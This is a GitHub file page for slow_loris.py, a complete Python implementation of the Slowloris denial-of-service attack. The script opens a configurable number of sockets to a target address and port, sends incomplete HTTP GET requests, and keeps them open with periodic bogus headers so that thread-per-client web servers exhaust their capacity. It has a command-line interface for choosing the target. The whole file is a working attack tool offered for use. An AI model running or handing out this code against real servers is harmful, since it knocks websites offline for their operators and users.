-
Notifications
You must be signed in to change notification settings - Fork 0
/
slow_loris.py
135 lines (117 loc) · 3.78 KB
/
slow_loris.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
This is a simple python implementation of slow loris attack.
Slow Loris only works on Apache servers, since it pops a thread for every new
client.
"""
import time
import socket
import random
import argparse
#Headers to be sent at the beginning of the connection
HEADERS = [
b"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;\
rv:49.0) Gecko/20100101 Firefox/49.0",
b"Accept-language: en-US,en,q=0.5",
]
def socket_error(sock):
""" Handles a socket error: kills the socket. """
print("Socket error, killing socket")
sock.close()
sock = None
return sock
def init_socket(socket_t):
""" Inits a socket and sends the first headers. It also sends the start
of the request.
"""
sock = socket.socket(socket_t[0], socket_t[1], socket_t[2])
sock.settimeout(15)
sock.connect(socket_t[4])
if sock:
try:
sock.send(b"GET /?%d HTTP/1.1\r\n" %random.randint(0, 5000))
for header in HEADERS:
sock.send(header)
except OSError:
sock = socket_error(sock)
return sock
def send_header(sock):
""" Sends a chunk of header to the server to keep it waiting.
"""
if sock:
try:
value = random.randint(1, 5000)
sock.send(b"X-a: %d\r\n" % value)
except OSError as msg:
print("Socket error:\n%s\n killing socket" % msg)
sock.close()
LIST_OF_SOCKETS.remove(sock)
def slow_loris(socket_tuple, sock_number):
""" Implements the attack. Creates the given number of sockets, and manages
it, recreating socket if necessary.
It assumes that the ip is not none, and that sock_number is a positive
number.
"""
for _ in range(sock_number):
sock = init_socket(socket_tuple)
if sock:
LIST_OF_SOCKETS.append(sock)
print("Created socket %d" % len(LIST_OF_SOCKETS))
while True:
print("Sending keep-alive headers."
"Remaining sockets: %d" % len(LIST_OF_SOCKETS)
)
for sock in LIST_OF_SOCKETS:
send_header(sock)
for _ in range(sock_number - len(LIST_OF_SOCKETS)):
sock = init_socket(socket_tuple)
if sock:
LIST_OF_SOCKETS.append(sock)
print("Recreating socket...")
time.sleep(15)
return 0
def validate_args(args):
""" Checks if the arguments are valid or not. """
# Is the number of sockets positive ?
if not args.number > 0:
print("[ERROR] Number of sockets should be positive. Received %d" % args.number)
exit(1)
# Is a valid IP address or valid name ?
try:
servers = socket.getaddrinfo(args.address, args.port, proto=socket.IPPROTO_TCP)
return servers[0]
except socket.gaierror as error:
print(error)
print("Please, provide a valid IPv4, IPv6 address or a valid domain name.")
exit(1)
if __name__ == "__main__":
# Manages the list of sockets
LIST_OF_SOCKETS = []
DESCRIPTION = "Attacks the web server at the given IP \
with the Slow Loris attack"
PARSER = argparse.ArgumentParser(description=DESCRIPTION)
PARSER.add_argument(
"address",
type=str,
action="store",
metavar="ADDRESS",
help="The address or hostname to attack",
)
PARSER.add_argument(
"-n", "--number",
help="Number of sockets to open (default=200)",
action="store",
type=int,
default=200,
)
PARSER.add_argument(
"-p", "--port",
help="Port to attack",
action="store",
type=int,
default=80,
)
ARGS = PARSER.parse_args()
SOCKET_TUPLE = validate_args(ARGS)
slow_loris(SOCKET_TUPLE, ARGS.number)